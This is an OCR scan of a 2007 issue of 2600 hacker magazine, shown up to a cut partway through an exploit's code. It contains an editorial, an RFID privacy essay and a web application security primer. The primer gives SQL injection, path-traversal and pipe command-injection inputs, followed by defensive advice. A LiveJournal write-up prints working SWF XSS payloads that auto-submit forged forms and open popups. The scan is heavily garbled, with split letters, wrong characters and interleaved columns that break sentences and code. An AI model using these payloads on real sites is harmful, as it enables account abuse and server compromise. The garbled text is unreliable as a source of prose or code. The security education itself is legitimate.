2600 v24 n1 (spring 2007)

TIDBITS
Challenges....................................................................................................4
Understanding Web Application Security. . . . . . . ... . ... . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . .6
RFID: Radio Freak-me-out Identification. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . .9
Exploiting LiveJournal.com with Clickless SWF XSS . .. . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11
Telecom Informer . . .. . . . . . . . . . . . . . . . .. . . . . . . . . .. . . . . . . . .. . . . . .. . . . . . . . . . . . .. . . . . . . . . .. .. . . . . . . ... . . .. .. . . . .13
Avoiding Internet Filtering . . . . .. .. . . . . . . . . . . . . .. . . . . . . . . .. . . . . . . ... .. . . . . . . . . . . .. . . . . .. . . . . . . . . . . . . . . .. . . . . 15
Hacking Your Own Front Door . . . . . .. . . . . .. . . . . . .. . . . . . . . . . . . . . . . . . . . . . . .. . . . .. . . . . . . . . .... . . . . . . . . . . .. . .16
Dorking the DoorKing . . . .. .. . . . . . . . . . . . . . . . .. . . . . . . . . . . .. . . . . . . . . . . .. . . . . .. . . . . . . . . . . .. . .. . . . . . . . . . . . . . . . .18
Security Holes at Time Warner Cable ... . . . . . ... . ... . . . .. . . . .. . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
Hacking My Ambulance .. . . . ... . . . . . . . . . . . . . . . . . ... . .. . . . .. . . . . . . . . . . . . . . . . . . . .. . . . . . . . .. . . . . . . . . . . . . . . . . .20
SSL MIT M Attacks on Online Poker Software..........................................................24
Hacker Perspective. . . . . . . . . . . .. . . . . . . . .. . .. .. . . ... . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . 26
Ripping MMS Streams . . . . . . .. . . . .. . . .. . . . . . . . . . .. . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . ..29
Backspoofing 101...........................................................................................30
Can I Read Your Email? . . . . . . . . . . . . . . . . .. . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . .. . . . . ... . . . . . . . .. . . . . . . . .. . . . . . . ..32
Letters. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .34
Stalking the Signals . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . ... . . . . . . . . . . . . ..48
GoDaddy.com Insecurity . . . . . . . . . . . .. . . . . . . . . . . . . .. . . . .. . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . ..50
Hubots: New Ways of Attacking Old Sy stems . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . ..51
Network Ninjitsu: Bypassing Firewalls and Web Filters . . .. . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . .. ..52
Hacking a Major Technical School's Website .........................................................54
Covert Communication Channels . . . . . . .... ... .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . ..55
How to Cripple the FBI.....................................................................................60
Marketplace. . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . ... . .. . .. . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . .. . . . . 62
Puzzle. . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . . . .. . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .64
Meetings. . . .. . . ... . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . .. . . . . . . . . . . . . .. . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66

Please believe us when we say that we
don't i ntentionally set out to cause trouble and
mayhem. It somehow seems to always find
us.
We started a hacker magazine because it
was a subject that was of i nterest to a number
of us and there was a void to be fil led. We
didn't expect the fascination, fear, obsession,
and demonization that fol lowed us, courtesy
of everyone from the media to the government,
from the Fortune 500 to h igh school teachers
and principals. It just sort of happened that
way.
We didn't ask to be thrown i nto the front
l i nes of the motion picture i ndustry's copyright
battles back in 2000. That also just happened
because of who we were and what we bel ieved
in. There were many thousands that the Motion
Picture Association of America could have
taken to court for hosting the DeCSS code on
their websites. But we somehow epitomized
everythi ng the MPAA was against and this
made us the perfect target for them. Merely
existing apparently was enough .
And by simply being present at various
pivotal moments in hacker h istory where
there was nothing for us to do but speak out
agai nst various i njustices, we again found
ourselves being propel led i nto a position of
advocacy and leadership, when really a l l we
were doi ng was continuing to make the same
poi nts on what hacking was and what it was
not. Locking people in prison for being overly
curious or experimenting on the wrong bits of
technology was just wrong, plain and simple.
It was a point we had started our very first issue
with . And si nce so few others were saying this
out loud, it became our fight once more.
Th is kind of th ing never seems to end.
Also in the year 2000 wh i le a l l eyes were
on the Republ ican National Convention i n
Ph i ladel phia, i t was our own layout artist
who was grabbed ofi the streets and locked
up on half a m i l l ion dol lars bail, charged
with bei ng a ch ief ringleader of opposition.
The only evidence agai nst him was survei l
lance footage that showed him walki ng down
a street talking on a cel l phone. Needless to
say, it didn't stick and, in fact, a lawsuit against
the city for this nonsense was quite successfu l .
But even that wasn't the final chapter of the
story. Four years later in New York, our editor
was also taken off the streets whi le the Repub
l ican National Convention was in that city.
This time it seemed to be a random sweep of
people who just happened to be standing on
a particular block. Again, it provoked wide
spread outrage and condemnation, as wel l as
a l l charges being dropped and a lawsuit which
continues to be argued i n court to this day. But
there's sti l l more. Recently a judge ordered
the New York Pol ice Department to release
i nternal documents on these events which
they had been trying to keep to themselves.
These documents started to see the l ight of day
i n February of this year. And among the first
to be revealed so far is a memo that outl i nes
what one of their biggest fears was. Yes, that's
right. Us again. Apparently the NYPD was
concerned because not only was our layout
artist rumored to be in town (possibly prepared
to use his phone again) but he had spoken at
a conference directly across the street from
where the Republ ican Convention was to be
held. And he had spoken on potential ways of
causing mischief and mayhem! So once again
we were catapulted to front and center, j ust for
discussing the thi ngs that are of i nterest to us.
Even the location of our conferences, held in
the same place since 1994, were cal led into
question as bei ng provocative because they
were so close to the site of the Republ ican
Convention.
It a l l almost reads l i ke a badTV snipt, where
the same characters keep getting launched into
the center of attention week after week. I n that
kind of a setti ng, this happens because there
are only a certain number of characters and
the story l i nes have to be kept interesti ng and
active. In real l ife, this only serves to demon
strate the threat of actually reach ing people
who may share your i nterests and goals. Not
only can you change the course of history in
accompl ish i ng this but the fear you insti l l along
the way among the powers-that-be might itself
also have a profound effect on the outcome.
Scary stuff i ndeed.
Page 4 --------------------- 2600 Magazine

B ut now we find ourselves yet again i n a style" wal l of advertising that would replace
position where we have no choice but to take the ornate entryway of the existing hotel.
a stand and help start someth ing that cou ld So the financial i ndustry and the advertisers
have a profound effect on a lot of people. wou ld be thril led. But the people who visit
And this time it goes wel l beyond the hacker New York City wou ld have one less afford
community. We learned earl ier this year that able hotel to stay in (the nearly 2000 rooms
the site of our conferences mentioned above in Hotel Pennsylvania are often fil led year
- New York's historic Hotel Pennsylvania - is rou nd) and one more historic structure wou ld
set to be demol ished. As of this writing, the be destroyed. Thi s doesn't even address the
only opposition to thi s has been a whole lot overwhel m i ng belief that such a massive
of voices i n the w i lderness with no apparent financial structure simply isn't needed with
u nity. So once more it appears that our the entire financial district downtown bei ng
community wi l l have to step up and hope- rebu i lt. Were it to be constructed, however,
ful l y make a difference. there is l i ttle doubt that it wou ld become a
Why shou ld we care? Si mple. Ever since heavily guarded fortress with very l i mited
starting the Hackers On Planet Earth confer- accessibility due to post-91l 1 syndrome, i n
ences back i n 1 994, the Hotel Pennsylvania stark contrast to the open and bustl i ng hotel
has been our home (with the exception of lobby that currently occupies the space.
Beyond HOPE in 1 99 7). It has three major We know the hotel isn't i n the fi nest of
factors going for it: 1 ) Location - the hotel is shape. I n this age of "bigger is better" and
directly across the street from the busiest tra i n i nsisting that every modern convenience be
station in North America and also centra l l y with i n reaching distance a t a l l ti mes, there
located i n Manhattan; 2) H istory - the hotel are many who simply can not handle a place
is a fascinating connection to the past, both with such Old World decor. But it's sti l l our
architecturally and i n the many events and home and we've grown rather attached to it.
people who have been l i n ked together over Without it, the future of the HOPE confer
the decades i n its vast hallways; and 3 ) Cost ences wou ld be very much in jeopardy and
- the relative cheapness of the hotel i s what certainly not as convenient to get to for those
makes it possible for us to continue to have from out of town. And this is the key. The
the conferences in New York City as wel l as majority of people affected by its destruction
for our attendees from out of town to be able wou ld l i kely be people who don't l ive locally
to stay there. and have probably not even heard of these
There was one thing that was drummed ominous plans yet. That is something we can
i nto our heads over and over again when change.
we were looking to start a major hacker We also have to realize that this is so
conference in the U nited States, especial ly i n much bigger than o u r own relatively sma l l
response to o u r desire to have it i n New York: community. There are scores of other confer
It was i mpossible. And to this day it remains ences and l iterally m i l l ions of people who
i mpossible that we could hold an event of have wal ked through the doors and gotten
th is size in a c ity l i ke New York and manage something out of the place. By l i nking as
to keep it affordable. B ut we do it anyway. It's many of them together as possible, we have
because of a combination of magical ideas, the potential of u n iting forces and, at the very
the magical people who come and build it least, speaking out loudly agai nst losing this
every two years, and the magical place that hotel. It seems as if th is has become our obli
makes it a l l possible. Th is is a l l most defi- gation. And, as h i story has shown us, being
n itel y worth preservi ng. who you are at a particular place and poi nt i n
I n the "real word" however, people don't time is sometimes a l l you need.
thi n k l i ke this. It a l l comes down to dol lars and The odds are certainly against us. And this
cents and how to make the most i mpressive is l i kely to be a fight that we're involved i n
profit. And those i n charge (namelyVornado, for qu ite some time to come. But we bel ieve
the realty firm that happens to own the hotel) getting i nvolved i n this could be an upl ifting
felt it would be most profitable to tear down experience, one where we tru ly real ize the
the hotel and replace it with a huge financial importance of i ndividual voices brought
tower. Those in the finance i ndustry wou ld together i n a common cause. There wi l l be
no longer have to ride the subway downtown lots more on this in the future. For now, we
to get to work. Instead they could commute hope you can joi n us on l i ne at http://tal k.
from the suburbs by train, exit Penn Station, hope.net to discuss ways to save the hotel
and simply wal k across the street to their jobs. (and plan for future HOPE conferences) i n
And everyone leaving Penn Station wou ld a l ively forum environment. And we hope
wind up being barraged with a "Times Square everyone can help us spread the word.
Spring 2007--------------------- Page 5

by Acidus
acidus@msblabs.org
Most Significant Bit labs
(http://www.msblabs.org)
Web app l i cations are complex services
run n i ng on remote systems that are accessed
with only a browser. They have mu ltiple
attack vectors and this article is by no means
a comprehensive guide. Today I wi l l discuss
what web appl ications are, how they work,
discuss common attack methods, provide
brief examples of specific attacks, and discuss
how to properly secure a web app l ication.
What do I mean by web appl ication? A
web application is a col lection of static and
dynamica l l y generated content to provide
some service. Maybe it's Wikipedia providing
an ever-updating knowledge base or Amazon
providing a commerce portal . These app l i
cation can span mu ltiple domai ns, such as
Wachovia ' s on l i ne banking system. As you
can see in Figure 1 , web applications have
mu ltiple parts. There is a program used to
access the web appl ication known as a user
agent. There i s a JavaScript logic layer which
allows very l i mited code to execute on the
c l ient's machi ne. This is i mportant because
sendi ng requests across the Internet cloud to
the server is expensive in terms of time and lag.
There is a web server which has some kind of
server logic l ayer. This layer uses i nputs from
the c l ient such as cookies or parameter val ues
to dynamica l l y generate a response. Usua l l y
t h i s response is composed o f data stored i n
a back end database. Th is database is main
tai ned and populated by various programs
l i ke web crawlers and adm i n scripts.
Web app l i cations are not a passi ng fad.
Major companies l i ke Amazon, eBay, Google,
Saleforce.com, and U PS a l l use complex web
applications with several deriving a l l thei r
i ncome from them. Many more compan ies
are develop i ng web apps strictly for i nternal
use. The cost benefits of having an applica
tion that is centra l ly managed and ca n be
accessed by any browser regardless of the
u nderl ine as are simply too great to ignore.
With their place i n the o n l i ne landscape
assured it is essentia l for hacker and secu rity
professional a l i ke to u nderstand fundamental
security risks of a web app l i cation.
As you can seeweb applications differ from
traditional appl ications in that they exist on
n umerous tiers and span mu ltiple discipli nes.
Programmers, i nternal web designers, graphic
artists, database adm i ns, and IT adm ins are
a l l i nvolved. It's easy for thi ngs to s l i p through
the cracks because people assume a task is
someone else's responsib i l ity. This confusion
gap i s ripe for vul nerabi l ities.
Backend
Processes
Page 6 ---------------------- 2600 Magazine

Attacking web appl ications is a lot l i ke of this article.
being a detective. The structure of the appli- Parameter Manipulation
cation contains your cl ues. From them you Parameter manipulation i nvolves modi-
learn i nformation about its structure, if the fyi ng the val ue of i nputs trying to make the
appl ication is using pre-made components app l ication act i n ways the designers never
(l i ke phpB B), what its i nputs are, and what i ntended. We have a l l seen a site with a
types of resources are ava i l able. You also have URL l i ke "site.com/story.php?id=1 732". The
a l i st of witnesses you can ask to get i nforma- "id" input specifies which resou rce to serve
tion not directly available from the site. These up. Modifying this val ue al lows access to
are your search engi nes. How often is the site different stories that m ight not normally be
updated? Does the IT staff ask questions on available. This incl udes th i ngs l i ke archived/
new groups or forums? Are there any known deleted items or future/unpubl ished items.
vu l nerabi l ities against any of the appl ication ' s Th is techn ique is known as "va l ue fuzzi ng"
components? Th is is just basic system finger- and is qu ite usefu l .
pri nti ng, only you are fingerprinting an app l i - What i f we send a request with "id=-
cation instead of a system. 1"? Chances are the application wi l l return
Web appl ication attacks fal l i nto two cate- an error. However the error m ight contain
gories: resource enumeration and parameter i nformation that is usefu l . Th i ngs l i ke the fi le-
manipulation. system path for that resource. Maybe we' l l
Resource Enumeration get some information about what database
Resource enumeration is a l l about the app l ication tried to contact or even i nfor
accessi ng resources that the web applica- mation about the structure of that database!
tion doesn't publ icly advertise. By this I mean Perhaps we' l l get a stack track that wi l l show
resources that exist but have no l i n ks to them what functions the program is cal l i ng or even
anywhere in the web appl ication. the val ues of the parameters. This technique
The first way to execute resource enumer- is known as "edge case testing" or "bounds
ation is based on thi ngs you al ready know testing." Programmers commonly forget to
about the appl ication. If Checkout.php exists, deal with edge cases so th is area is ripe for
make a request for Checkout.bak or Checkout. vu I nerabi I ities.
php.old. If you succeed you'l l get a copy of There are several attacks which are
the PHP source code complete with database really j ust specific examples of parameters
connection strings and passwords. manipu lation. We wi l l discuss SQL I njec-
In addition to what fi les are present in the tion, Com mand Execution, and Cross Site
application, you also know about the struc- Scripti ng.
ture. Suppose there is a resource l i ke "/users/ SQL Injection
acidus/profi les/bookmarks.php". After trying Almost a l l complex web application,
various permutations of bookmarks.zip and from Amazon to Ti nyURL, have a back end
such, sending a request for "/users/" cou ld database. The inputs you supply the web
return somethi ng interesting. Perhaps it's a appl ication when you request a resource are
di rectory l i sti ng, or it serves an older default eventual ly converted i nto some kind of SQL
page. Regardless, you wi l l find l i n ks to statement to extract content from this back
resources that m ight not be mentioned else- end database. Depending on how wel l the
where on the site. Whi le web servers can be i nputs are fi ltered you can get arbitrary SQL
configured to deny access to directories, this statements to run on this back end database.
setting can be global or specific to a folder It is best to show an example. Suppose we
group. Any setti ngs can a lso be overridden discovera URL l i ke "/Showltem.php?id=2 7 1 0".
on a per folder basis. Just because "/users/" Chances are 2 7 1 0 is the pri mary key i n some
or "/users/acidus/" don 't work doesn't mean kind of product table in the database. Let's
"/users/acidus/profi les/" won ' t work. Always say in the PHP we have an SQL statement
send requests for every di rectory you see. that looks l i ke SELECT * FROM Products WHERE
Once you 've sent requests for resources prodID = + id. This is cal led a concatenated
based on thi ngs you know, you shou ld si mply query string and is vulnerable to SQL I njec
guess for resources. "/test.aspx", "/temp.php", tion. If I send 2710 UNION ALL SELECT * FROM
and "/foo. html " are good ones. You cou ld try Customers the resulting SQL statement is
"db. i nc", "password.txt", or "website.zip". The SELECT * FROM Products WHERE prodID = 271 0
directories "/admi n/", "/stats/", and "/prOnl" are UNION ALL SELECT * From Customers. This
good ideas too. A comprehensive l ist of fi les statement w i l l return the product i nformation
and di rectories to guess is beyond the scope for product 2 7 1 0 and a l l the records in the
Spring 2007---------------------- Page 7

Customers table (assuming it exists). This is
simply one example of sQL i njection. See 111
and [21 from more i nformation.
SQL i njection is a big problem. The Paris
Hilt()nl�Mobi le hack didn't happen because
someone sn iffed the phone's traffic. T-Mobile's
website had an i nterface to al low subscribers
access to their address books. This means
the website had to touch the database that
Cross Site Scripting
Cross Site Scripti ng (XSS) is a mechanism
to i nject Javascript i nto the web page that is
returned to the user. Consider the simplest
example, as shown i n Figure 2. The web
appl ication has a personal ized greetings
page. The key to the vulnerabil ity is that the
i nput parameter name is reflected i nto the
page that is returned to the user. As Figure 3
stores contact i nformation. An attacker found shows, if I i nsert a block of Javascript it too
an input they could exploit and dumped out is returned to the user. So what can do you
�everal address books through the T-Mobi le with Javascript? You can steal cookies, h ijack
web page using sQL i njection . sessions, log keystrokes, capture HTML traffic
.--'--"------''-----'------/---:----------------, (aka screen scrapping), and many
http://eXample.comlhello'Ph7pna�BIIJY-' .
other th i ngs. See [5J and [6] for
/'
more i nformation about nasty
./#'-'
th i ngs Javascript can do. See [7]
/' '" <HTML> for a case study using XSS + AJAX
/':"'''/''' ..
to make malicious requests as
4' <hl>Helio there BWy,</hl> another user.
Xss can also get i njected
i nto the back end database of
'--___________<.:.!f.;..·H;.:.T .:...M;.:;L .:...>________.J a website, commonly through
Command Execution
Many times there are applications that are
executed on a web server simply by visiting
a page. For example, nslookup, whois, finger,
pi ng, traceroute, uptime, who, last, and cat
can be found i n 50-cal led appl ication gate
ways. This is where a web page receives i nput
from the user and passes it to a native app l i
cation, returning the output. These gateways
are qu ite common dna were among the first
uses of web pages and CGI. Here is an actua l
Perl script I 've seen i n the wild which serves
pages:
$res � param('file'),
open (FIN, $res);
@FIN = <FIN>;
foreach $fin (@FIN) { print "$finn" }
A request for "/cgi-bin/fi le.cgi ?fi le=contact.
html" wi l l return the contents of the fi le. First
of a l i i can see one vulnerabil ity that isn't even
a command execution. Making a request for
"/cgi-bi n/fi Ie.cgi ?fi Ie=. .I. .I. .I. ./. .letc/passwd"
wi l l give you the Unix password fi le. Further,
the open command supports the use of pipes.
Pipes a l low a command to be executed and
its output sent to another program. A request
foru m posts, member profiles, and custom
stock tickers. This is especially nasty since
the XSS wi l l affect many more people. There
are many avenues to launch Xss attacks. [8J
provides a detai led look at the different XSS
mechanisms and defensives.
As you can see XSS is an extremely
complex topic and I 've only brushed the
surface. Due to technologies l i ke AJAX and
the fact that everyone is using standards
compl iant browsers the danger of XSS is
much higher than it was when XsS was origi
nally discovered i n 2000. For some of the
rea l ly nasty stuff, see my B lack Hat Federal
presentation [91.
Defensives
Almost a l l web application attacks can
be stopped by va l idating or filtering the
inputs of the appl ication. sQL i njection isn't
possible if you r numeric i nputs only contain
n umbers. XsS attacks are not possible if you
don 't a l low a subset of a markup language i n
you r input. A wel l placed regex can save you
a lot of headache if it's in the proper place.
Just because you have cl ient side Javascript
for "/cgi-bi nlfi le.cgi?file=nmap
-vi" wi l l execute nmap on the
server if it exists ! This happens
because the open function wi l l
http://example.comlhello.php1name=�IPT>badness..
//
execute the nmap command
for you and the pipe means the
open function reads the output
/
" ''
''
<HJ£
/;/,./:" <Hl>Helio there <SCRIPT>badness..
from "nmap -v" as if it were a
file. See 131 and [41 for more </HTML>
i nformation.
Page 8 --------------------- 2600 Magazine

to val idate i nput val ues doesn't mean you're
protected. I can always directly connect to
you r application and completely bypass your
fi lters. Always i mplement fi lters on the server
side! Your mantra shou ld be "never trust
anything I get from the c l ient." Everything you
get from the c l ient incl uding cookies, query
stri ngs, POST data, and HTTP headers can a l l
b e faked. Always make sure you implement
some kind of length restriction on you r field
too. Otherwise someone m ight implement
a fi lesystem on top of your web application
[1 0]!
Conclusions
I hope this article served as a n ice primer
on a l l the issues surrounding web app l i cation
security. It's a complex field and I encourage
you to check the cited works to learn more.
There is no group, there is only code.
References
[1 ] SQL Injection Whitepaper (http://www.
...spidynam i cs.com/spi l abs/education/wh i te
"'papers/SQLinjection.html) Examples of SQL
i njection.
[2] Blind SQL Injection Whitepaper (http://
...www.spidynam ics.com/assets/documents/
...B l i nd_SQLlnjection.pdf) Examples of B l i nd
SQL I njection where you don 't have ODBC
error messages to help you craft attacks.
[3] Web Security and Privacy (http://www.
...orei l ly.com!cataloglwebsec2/i ndex.html ) A
rather dated O ' Rei l ly book that has an excel-
RFIO:
lent security section i n chapter 1 6.
[4] Perl eel Security Notes by Chris (http://
...www.xed.ch/lwm/securitynotes.html) Wel l
written page goi ng into many more command
execution issues with Perl than I covered.
[5] XSS-Proxy (http://xss-proxy.sf.net) XSS
Proxy shows how JavaScript can be used to
mon itor keystrokes and can receive th ird
party commands.
[6] Phuture of Phishing (http://www.
...msblabs.orgltal ksl) Shows some of the nasty
thi ngs you can do with XSS and how XSS can
fac i l itate phishi ng.
[7] MySpace.com Virus (http://namb. la/
...popular/tech.html) Technical deta i l s of the
MySpace.com virus as told by the author.
Shows how XSS attacks can be augmented by
AJAX.
[8] Real World XSS (http://sandsprite.com/
...Sleuth/papers/ReaIWorld_XSS_l.htm l) An
excel lent paper discussing a l l aspects of the
XSS risk.
[9] Web Application Worms and Viruses
( h ttp : //ww w. s p i dy n a m i c s . c o m /s p i l a bs/
"'ed u c a t i o n/prese n t at i o n s/b i Il y h offm a n
...-web_appworms_viruses.pdf) Deta i l s self
propagating web malware and shows some
very nasty implications of XSS.
[1 0] TinyDisk (http://www.msblabs.orgl
...tinydiskl) Implementing an app l i cation on
top of someone else's web app l i cation.
Radio Freak-me-out Ide
by KnlghtlOrd
KnlghtIOrd@knlghtIOrd.org
RFID has become something of a hot
topic in the hacking world. There have heen
mu ltiple presentations on security and privacy
of RFID and also the technology heh ind it.
Th is article is designed to be a what-if type
scenario on what RFID is potentially capahle
of and where the technology is headi ng.
RFI D stands for Radio Frequency Iden
tification which obviously means identi
fying objects using radio frequency. Current
i mplementations i nclude a�set management,
i nventory control, inventory tracking, access
control, and entity identification. The first
three are usually implemented i n a busi
ness environment to track i nventory from
one location to another or to mon itor asset
activity to isolate theft situations and problem
areas. These implementations of RFI D are
very efficient and perform a val uable task for
Spring 2007--------------------- Page 9

a business. The fourth example is not so good.
RFID is being changed into a new type of I D
for people a n d animals t o b e used instead of
a hard-copy form of identification . This may
seem convenient for people and they don't
see why this is bad . There are many possi
bilities for this technology to turn our world
upside down and al low for Big Brother to
tru ly manifest itself.
Cu rrently a human being can receive an
implanted RFID chip that stores an identifica
tion n umber that associates them with infor
mation in a database. This can be anything
from personal data such as name, address,
and birth date to medical history, financial
information, family information, etc. The
cost of storage space now is so cheap that it
wou ldn't be out of the question to store just
about every type of information on any one
person so that any organization ca n utilize
the technology imbedded in said person . If
you don't get where I am going with this then
think a massive database with information on
every person that has an implanted tag. Now
you may say what is the big deal? There are
al ready databases out there with our informa
tion. Why should one more be any different?
Wel l the problem is this. Any database that
contains that vast amount of information
has to be control led by someone. More than
likely that someone wil l be the government.
This may not seem so scary either. B ut wait,
there is more.
The possibilities are then endless for the
data and scenarios that the government
can observe. Not only can the government
observe this information but so can anyone
else who can figure out how to get the data
off the tags. Si nce our country is basical ly
run by huge retail outlets it is not too far of
a stretch to see product marketing analysis
based on human purchase activity which is
a l l based on RFID technology. Picture wal k i ng
into Wal-Mart and having the racks scan your
RFID tags and create some kind of notice to
you to point on items that you prefer based
on past purchase history. You regu larly buy
black cotton t-shirts in size large so the rack
wil l recognize this data and highlight the rack
with the black cotton t-shirts with little lights
attached to a l l the hangers that flash as you
approach. The same can be said about shoes.
You wear a size 13 so it shows you only the
size 13 shoes in stock. Now take it one step
further and say you purchase one of those
pairs of shoes. The shoes themselves have an
RFID tag imbedded in them so now not only
can we see where you are going based on the
implanted RFI D tag, but we can also see that
you bought your shoes from Wal-Mart and
produce Wal-Mart advertising on interactive
bil lboards as you pass by.
When you wal k into a coffee shop they
wil l al ready start making you r favorite coffee
because they got that information from your
tag. This may seem cool, but then they ask
you how your mother is doing because they
saw on the report that she had come down
with an il l ness and had to go to the hospital
the day before and they now have her taking
penicil lin for an infection . That thought in
itself is pretty scary. You don't want your local
coffee house to know everything about you,
do you? How can you even make a sma l l
decision like whether you want cream o r not
if they al ready know based on trends they
have analyzed on you r activity for the last
fiscal year?
When everyone becomes a n umber we
wil l see the true possibilities of this tech
nology. A wealth of knowledge is attached to
you and that information is accessible by way
too many people for it not to be a little scary.
There are good things that can come out of
this, but is convenience better than privacy or
free wil l? I think not.
RFID in its current implementations has
been proven to be a reliable solution for
tracking inventory. Change the word inven
tory to h u mans and you see the problem. The
technology does not change from one imple
mentation to the other. The data on the tag
may change somewhat, but the fundamentals
do not. So what is stopping the government
from placing readers on every government
owned piece of property and monitoring
the activities of everyone with an implanted
tag? Not a whole lot. Right now the cost for
a reader is about $40 to $120 for a LF (low
frequency) module. The government, being
its omnipresent self, can get these devices for
less or manufactu re them for less and tailor
the technology to act as it wishes. The cost
for an implant is around $20 for the tag and
the cost of implantation which can vary from
one doctor to another. There is not a whole
lot stopping the government from doing this.
Page 10 --------------------- 2600 Magazine

E::-::t:· 1 .:. 1
L.j i t.r-I
by Zaphraud
This article wil l focus on a clickless SWF
XSS exploit of LiveJournal.com and the
importance of:
-Learning from the past.
-Auditing al l errors to at least determine
what caused them .
-Last but not least, the u ltimate form of
code auditing: Using your program while
intoxicated, to simulate a "regu lar" user.
As of 6-0ctober-2006 Livejournal staff
closed this vulnerability in the video template
system.
Recent Background
A few months ago, LiveJournal joined other
blogging sites in supporting video content for
its members. Initial ly, the template system
was used. Later, support was also added
for simply pasting OBJECT-style code from
Youtube or Photobucket. Focus here is on
the template system, which works as fol l ows
using a URL pasted in from one of the two
allowable services, YouTube or Photobucket:
<LJ TEMPLATE=NAME>http : //www.youtube .
"com/watch?v=d3PyLe6 s ivE</LJ-TEMPLATE>
The very first thing that crossed my mind
when I saw this was "Gee, I bet they are only
checking domain names." I proceeded to
post an entry on August 2nd featuring a sma l l
Mozilla banner that I had uploaded t o Photo
bucket for the purpose of testing this. The post
is at acpizza.livejournal.com/499638.htm l
and uses the fol lowing snippet:
<lj -template name = ''video ''>http://img.
"photobucket . com/albums/v51 0/zaphraud/
"misc/mozilla . swf</l j -template>
On 1 3-September-2006, I discov-
"Funny/longcat. swf" </1 j -template>
It didn't work and I edited it to fix it. Bear
in mind that I was dru nk, so once I figured
out what I did wrong by looking at previous
examples, is it any surprise that I ended up
with:
<lj -template name= ''video''>http://img.
"photobucket.com/albums/v51 0/zaphraud/
"Funny/longcat. swf"</lj-template>
after "fixing" the problem? Notice I drunk- !
enly left a quote at the end?
What happened next is key: Instead of
properly breaking with the normal Live
Journal error when HTML is a l l screwed up
[Error : Irreparable invalid markup ( 'what
ever was bad ') in entry. Owner must fix
manually. Raw contents below.], I saw the
word OBJECT on one side and a quote and
a "
> on the other side, with a working video
in the middle, presu mably from the EMBED
tag.
Yes, as it turns out from viewing the
sou rce, it was possible to pass parameters
to the flash. I nitial ly I played with this in the
fol lowing manner:
< l j -template name=''video' ' >http://img.
"Funny/zeldazvO . swf"height=" 1"width="1</
"l j -template>
Spaces in the URL are disal l owed.
However, by quoting parameters, separa
tion of arguments is preserved. This one pixel
"videO" is actually a hummed rendition of
the Zelda theme song, which as you can
imagine is quite capable of making people
confused when it ends up posted in a Live
Journal comm unity, or a message comment,
as there is not rea l ly any way to tel l where
exactly it came from short of viewing the
sou rce. At some point, a photobucket-hosted
meatspin.swf was posted to a comm unity, but
a moderator deleted it rapidly.
ered a hilarious meme while drunk and
posted another entry at acpizza.livejournal.
com/S01 921 .html and made the mistake of
putting quotes around the URL, as fol l ows:
<lj -template name=''video''> ''http : //img.
Perhaps because of people getting used
to MySpace profiles that are every bit as
Spring 2007-------------------- Page 1 1

annoying as late 1 990s Geocities web pages, abuse of this function went u nderreported.
Clearly, somethi ng larger was needed i n order to get th is problem fixed. It was time to reopen
a can of Exxon Seal Remover. . . .
<lj-template name= ''video ''>http://img.photobucket.com/(some url).swf"height
-="l"width="l"AllowScriptAccess="always</lj-template>
The AliowScriptAccess tag a l lows javascript to be run from flash.
I downloaded a trial version of Flash 8 and struggled with this monster app l ication's
awkward i nterface u nti l I figured out where I needed to drop my load, after which it became
extremely simple.
getURL("javascript:document.write( '<form method=post name=esr2006
action=http://www.livejournal.com/interests.bml><input type=hidden
name=mode value=add><input type=hidden name=intid value=456049><input
type=submit value=ESR></form>, );document.esr2006.submit();");
It basica l l y uses a single U RL i n order to write a l ittle HTML form, then cl ick on the submit
button. After it ran for a couple of hours i n a popular but much disl i ked comm u nity, I shut it
off and tried some other th i ngs.
Another person proved it possible to write a posting worm, in spite of LiveJournal 's separa
tion of domains, because since that time they have added another feature, l ivejournal .com/
portal/, that shows "friend's entries" on the main l ivejournal site which made it possible to use
javascript to manipulate the new post page, located at l ivejournal.com/update.bm l . This code
was never released i nto the wi ld, and was only tested in a steri l i zed form.
The fol lowi ng code was used by a troll, apparently an obese orange cat, posting i n the
"proanorexia" comm u nity:
getURL("javascript:document.write( '<html><body><script language=
"JavaScript"> function rUrl() { var cdate = 0; var sex = 0; targurl = new
Array(4); targurl[O] = "Donut_Girl"; targurl[l] = "Ronders"; targurl[2]
= "Andikins"; targurl[3] = "Shay"; var ran = 60/targurl.length; cdate
= new Date(); sex = cdate.getSeconds(); sex = Math.floor(sex/ran); return(
''http://encyclopediadramatica.com/index.php/ '' + targurl[sex]); } function
popupMe(){myleft=lOO;mytop=lOO;settings="top=" + mytop + ",left="
+ myleft + ",width=900,height=800,location=no,directories=no,menubar
=no,toolbar=no,status=no,scrollbars=yes,resizable=yes,fullscreen=yes
";PopupWin=window.open(rUrl(),"Popupwin", settings);PopupWin.blur();}
</script><form method=post name=esr2006 action=http://www.livejournal.
